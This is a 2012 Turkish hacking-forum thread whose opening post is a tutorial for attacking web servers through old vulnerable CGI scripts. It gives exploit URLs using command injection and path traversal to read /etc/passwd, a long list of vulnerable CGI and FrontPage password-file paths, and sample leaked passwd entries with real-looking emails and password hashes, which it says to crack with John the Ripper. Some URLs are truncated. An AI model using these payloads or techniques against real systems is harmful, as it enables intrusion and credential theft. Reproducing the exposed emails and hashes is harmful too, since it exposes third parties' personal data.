Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Web & Server Güvenliği

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.






cgi hack...!!!

Web & Server Güvenliği

Yeni Konu aç Cevapla
 
Seçenekler
Alt 06-07-2012 18:52   #1
  • Yüzbaşı
  • Üye Bilgileri
Üyelik tarihi
07/2012
Nereden
Bruksel
Mesajlar
Konular

Teşekkür (Etti): 6
Teşekkür (Aldı): 70


cgi hack...!!!



aciklarini bilmemesi potansiyel sistem aciklarina yol acmaktadir. Tum

dunyada pek cok hacker'in kullandiği cgi-bin guvenlik aciği:

http://www.kiracağimizadres.com.tr/c...%20/etc/passwd

Fakat bazi uyanik sistem yöneticileri phf komutunun kullanimini

sinirlamislardir. Bu yuzden bu komutu calistiramayabilirsiniz. Fakat yine

de alternatif web makinalari uzerinde denemekte yarar var.

b- (Wrap Scripti): Irix isletim sisteminin 6.2 versiyonunda rastlanan bu

hatayi da söyle istismar edebiliriz:

http://www.kiracağimizadres.com.tr/c.../../etc/passwd

http://www.kiracağimizadres.com.tr/cgi-bin/wrap?%0als (...)

Dikkat edeceğimiz tek nokta bu hata sadece IRIX 6.2'de var. !!

c- (View Source Scripti): Denemek serbest (basariya ulasabilme

ihtimali kadar ulasamama ihtimali de var)

http://www.kiracağimizadres.com.tr/c.../../etc/passwd

ya da

http://www.kiracaimizadres.com.tr/cg...iew-source?%1b or

%0a %20

d- (php.cgi Scripti):

http://www.victim.com/cgi-bin/php.cg.../../etc/passwd

e- Diğer Denenebilir Scriptler:

http://www.kiracagimizadres.com.tr/c...0-c%201000%20- or

%205000%20ip%20to%20shoot

http://www.kiracagimizadres.com.tr/c...cp%20phf%20fhp

http://www.kiracagimizadres.com.tr/c...%20phf%20.blah

http://www.kiracagimizadres.com.tr/c...l%20/dir/to/go

http://www.kiracagimizadres.com.tr/c...ww/dirtocreate

http://www.kiracagimizadres.com.tr/c...ogs/access_log


aglimpse > /cgi-bin/aglimpse
AnyForm2 > /cgi-bin/AnyForm2
args.bat > /cgi-dos/args.bat
AT-admin > /cgi-bin/AT-admin.cgi
bnbform.cgi > /cgi-bin/bnbform.cgi
campas > /cgi-bin/campas
carbo.dll > /carbo.dll
CGImail.exe > /scripts/CGImail.exe
cgiwrap > /cgi-bin/cgiwrap
classifieds.cgi > /cgi-bin/classifieds.cgi
Count.cgi > /cgi-bin/Count.cgi
displayopenedfile.cfm > /cfdocs/expelval/displayopenedfile.cfm
docs/codebrws.asp > /iissamples/sdk/asp/docs/codebrws.asp
edit.pl > /cgi-bin/edit.pl
environ.cgi > /cgi-bin/environ.cgi
exprcalc.cfm > /cfdocs/expelval/exprcalc.cfm
Fax Survey > /cgi-bin/faxsurvey
filemail.pl > /cgi-bin/filemail.pl
files.pl > /cgi-bin/files.pl
Finger > /cgi-bin/finger
fpcount.exe > /scripts/fpcount.exe
glimpse > /cgi-bin/glimpse
guestbook.cgi > /cgi-bin/guestbook.cgi
Handler > /cgi-bin/handler
howitworks/codebrws.asp > /iissamples/exair/howitworks/codebrws.asp
HTML Script > /cgi-bin/htmlscript
HTIMAGE > cgi-bin/htimage.exe
info2www > /cgi-bin/info2www
issadmin/bir.htr > /scripts/issadmin/bdir.htr
jj > /cgi-bin/jj
maillist.pl > /cgi-bin/maillist.pl
man.sh > /cgi-bin/man.sh
newdsn.exe > /scripts/tools/newdsn.exe
nph-publish > /cgi-bin/nph-publish
nph-test-cgi > /cgi-bin/nph-test-cgi
openfile.cfm > /cfdocs/expelval/openfile.cfm
perl.exe > /cgi-bin/perl.exe
perlshop.cgi > /cgi-bin/perlshop.cgi
PF Display > /cgi-bin/pfdispaly.cgi
PHF > /cgi-bin/phf
PHP > /cgi-bin/php.cgi
rguest.exe > /cgi-bin/rguest.exe
search97.vts > /search97.vts
sendmail.cfm > /cfdocs/expelval/sendmail.cfm
showcode.asp > /msads/Samples/SELECTOR/showcode.asp
survey.cgi > /cgi-bin/survey.cgi
Test-CGI > /cgi-bin/test-cgi
textcounter.pl > /cgi-bin/textcounter.pl
THC - Backdoor > /cgi-bin/rwwwsh*ll.pl
uploader.exe > /cgi-win/uploader.exe
view-source > /cgi-bin/view-source
view-source > /cgi-bin/view-source
VTI BIN [shtml.dll] > /_vti_bin/shtml.dll
VTI BIN [shtml.exe] > /_vti_bin/shtml.exe
VTI INF [_vti_inf.html] > /_vti_inf.html
VTI PVT [administrators.pwd] > /_vti_pvt/administrators.pwd
VTI PVT [authors.pwd] > /_vti_pvt/authors.pwd
VTI PVT [service.pwd] > /_vti_pvt/service.pwd
VTI PVT [users.pwd] > /_vti_pvt/users.pwd
Web Sendmail > /cgi-bin/websendmail
webdist.cgi > /cgi-bin/webdist.cgi
WebGais > /cgi-bin/webgais
wguest.exe > /cgi-bin/wguest.exe
wrap > /cgi-bin/wrap
www-sql > /cgi-bin/www-sql
wwwboard.pl > /cgi-bin/wwwboard.pl


Bunları nasıl kullanacaınızı biliyorsunuz !

2. Yol :
Manuel olarak aramak yerine işimizi kolaylaştırmak için bir CGI Scanner kullanabiliriz. Not: CGI'ları aradığınız sitede bulursanız bunu çalıştıran exploit'i de bulmanız gerekir. Şimdi diyelim ki *** yoldan birini kullanarak PHF açığını bulduk. Bunu şöyle kullanırız: http://www.domain.com/cgi-bin/phf?Q...t%20/etc/passwd yazarız. Tabi çıkan dosya etc içindeki username ve password'lerin olduğu password dosyası olacaktır. Şu şekilde:

slasher:VTNaA6DjT/9ME:1603:100:,robertmaier@gmx.net,,:/home/ slasher:/bin/bashpar
mcgreen:ryKOFkUDiGO3A:1604:100:,mail@reinhard-gruene.de,,:/h ome/mcgreen:/bin/bashpar
abi98:cUp.uUzNzr8YY:1605:100:,baileyberni@gmx.de,, :/home/abi98:/bin/bashpar
henner_:ziprJNh85rk.o:1606:100:,henner_@web.de,,:/home/henne r_:/bin/bashpar

Çıkan password'ları bir password cracker ile kırabilirsiniz (John The Ripper tavsiye edilir.) Manuel olarak veya bir program yardımıyla hack etmek istediğimiz sayfada service.pwd varsa ne yapacağız? http://www.domain.com/_vti_pvt/services.pwd
yazarız. İşte bir de PHP CGI örneği: http://www.domain.com/cgi-bin/php.c..../../etc/passwd Bu örneklere bakarak olayın mantığını biraz da olsa kavrayabilirsiniz. Bug'ı bulduktan sonra exploit'ini bulup veya yazıp çalıştırmanız gerek
 Offline  
 
Alıntı ile Cevapla
Alt 07-07-2012 16:54   #2
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
04/2012
Mesajlar
9
Konular
1

Teşekkür (Etti): 1
Teşekkür (Aldı): 0




neden domain comu ornek vermissin ben anlayamadım
 Offline  
 
Alıntı ile Cevapla
Alt 07-07-2012 19:46   #3
  • Yüzbaşı
  • Üye Bilgileri
Üyelik tarihi
07/2012
Nereden
Bruksel
Mesajlar
Konular

Teşekkür (Etti): 6
Teşekkür (Aldı): 70




ben onu bir misal olarak koydum
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
Siber Güvenlik
sosyal medya bayilik paneli
instagram takipci hilesi

wau